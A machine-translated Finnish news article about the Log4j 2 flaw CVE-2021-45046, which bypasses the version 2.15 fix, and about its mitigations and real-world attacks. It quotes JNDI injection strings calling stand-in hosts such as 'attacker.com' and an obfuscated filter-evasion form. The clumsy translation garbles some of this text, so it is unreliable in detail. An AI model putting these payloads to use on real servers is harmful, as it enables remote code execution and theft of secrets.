He havaitsivat toisen haavoittuvuuden Log4j 2, joka sallii haitallisen koodin suorittamisen

log4j

Äskettäin julkaistiin uutinen, että se oli havaitsi toisen haavoittuvuuden JNDI-haun toteutuksessa Log4j 2 -kirjastossa (CVE-2021-45046), joka ilmenee versioon 2.15 lisätyistä korjauksista huolimatta ja riippumatta suojausasetuksen "log4j2.noFormatMsgLookup" käytöstä.

Ongelma se on erityisen vaarallinen lähinnä Log4j 2:n vanhemmille versioille, suojattu "noFormatMsgLookup"-lipulla, koska sen avulla voit ohittaa suojauksen aiemmilta haavoittuvuuksilta (Log4Shell, CVE-2021-44228), jonka avulla voit suorittaa koodisi palvelimella.

Varten version 2.15 käyttäjille, toiminta rajoittuu olosuhteiden luomiseen hakemuksen epänormaalista lopettamisesta käytettävissä olevien resurssien loppumisen vuoksi.

Haavoittuvuus vaikuttaa vain järjestelmiin, jotka käyttävät kontekstihakua, kuten $ {ctx: loginId} tai säikeen kontekstikartta (MDC) -mallit, kuten% X,% mdc ja% MDC, rekisteröintiä varten.

Toiminto tiivistyy ehtojen luomiseen JNDI-korvauksia sisältävien tietojen lähettämiseksi rekisteriin, kun sovelluksessa käytetään kontekstikyselyitä tai MDC-malleja, jotka määrittävät rekisterin tulosteen muotoilun säännöt.

Los LunaSecin tutkijat huomauttivat kuin Log4j-versiot, jotka ovat alle 2.15, tätä haavoittuvuutta voidaan käyttää uutena vektorina Log4Shell-hyökkäykselle, joka johtaa koodin suorittamiseen, jos ThreadContext-lausekkeita käytetään lähetettäessä rekisteriin, joka sisältää ulkoisia tietoja, riippumatta siitä, onko lippu asetettu suojatuksi. "NoMsgFormatLookups" tai "% m {nolookups}" -malli.

Suojauksen ohitus rajoittuu siihen, että suoran korvauksen "$ {jndi: ldap: //example.com/a}" sijaan tämä lauseke korvataan välimuuttujan arvolla, jota käytetään säännöissä uloskirjautumisen muotoiluun. rekisteri.

Jos esimerkiksi kontekstipyyntöä $ {ctx: apiversion} käytetään lähetettäessä rekisteriin, hyökkäys voidaan suorittaa korvaamalla arvossa data "$ {jndi: ldap: //attacker.com/a}". kirjoitetaan poikkeamamuuttujaan.

Versiossa Log4j 2.15 haavoittuvuutta voidaan käyttää DoS-hyökkäyksiin siirrettäessä arvoja ThreadContextille, joka silmukoi tulosmuodon kuviokäsittelyn läpi.

Voidakseen yrittää ratkaista kohtaamat ongelmat päivitykset 2.16 ja 2.12.2 on julkaistu haavoittuvuuden estämiseksi. Log4j 2.16 -haarassa versiossa 2.15 toteutettujen korjausten ja JNDI LDAP-pyyntöjen "localhostiin" sitomisen lisäksi JNDI-toiminnallisuus on oletuksena kokonaan poistettu käytöstä ja viestien korvausmallien tuki on poistettu.

Kiertokeinona suositellaan JndiLookup-luokan poistamista luokkapolulta (esimerkiksi "zip -q -d log4j-core - *. Jar org /apache/logging/log4j/core/lookup/JndiLookup.class").

suhteen eri hankkeiden toimet:

että nginxNjs-moduulin pohjalta on valmisteltu komentosarja, joka estää JNDI-lausekkeiden lähettämisen HTTP-otsikoissa, URI:issa ja POST-pyyntöjen rungossa. Skriptiä voidaan käyttää käyttöliittymäpalvelimissa taustaohjelmien suojaamiseen.
HAProxylle tarjotaan määrityssäännöt, jotka estävät CVE-2021-44228:n toiminnan.

Aiemmin tunnistettujen hyökkäysten lisäksi, jotka kohdistuivat botnetin muodostamiseen kryptovaluutan louhintaa varten, tehtiin Log4J 2:n haavoittuvuuden hyödyntäminen haitallisten lunnasohjelmien levittämiseksi, jotka salaavat levyjen sisällön ja vaativat lunnaita salauksen purkamisesta.

Checkpoint on tunnistanut noin 60 muunnelmaa erilaisia ​​hyökkäyksiin käytettyjä hyökkäyksiä.

CloudFlare ilmoitti yrittäneensä testata Log4j:n haavoittuvuuden ilmenemistä ne tunnistettiin 1. joulukuuta eli 8 päivää ennen ongelman julkistamista. Ensimmäiset yritykset hyödyntää haavoittuvuutta kirjattiin vasta 9 minuuttia tiedon julkistamisen jälkeen. CloudFlare-raportti mainitsee myös korvausten käytön, kuten "$ {env: FOO: -j} ndi: $ {lower: L} antaa $ {lower: P}" jättää pois maskin "jndi: ldap" ja $ {env} hyökkäyslausekkeet siirtämään ympäristömuuttujiin tallennettuja salasanoja ja pääsyavaimia koskevia tietoja ulkoiseen palvelimeen ja $ {sys} lausekkeita keräämään tietoja järjestelmästä.

Vihdoin jos olet kiinnostunut tietämään siitä lisää voit tarkistaa seuraava linkki.


Ole ensimmäinen kommentti

Jätä kommentti

Sähköpostiosoitettasi ei julkaista. Pakolliset kentät on merkitty *

*

*

  1. Vastaa tiedoista: AB Internet Networks 2008 SL
  2. Tietojen tarkoitus: Roskapostin hallinta, kommenttien hallinta.
  3. Laillistaminen: Suostumuksesi
  4. Tietojen välittäminen: Tietoja ei luovuteta kolmansille osapuolille muutoin kuin lain nojalla.
  5. Tietojen varastointi: Occentus Networks (EU) isännöi tietokantaa
  6. Oikeudet: Voit milloin tahansa rajoittaa, palauttaa ja poistaa tietojasi.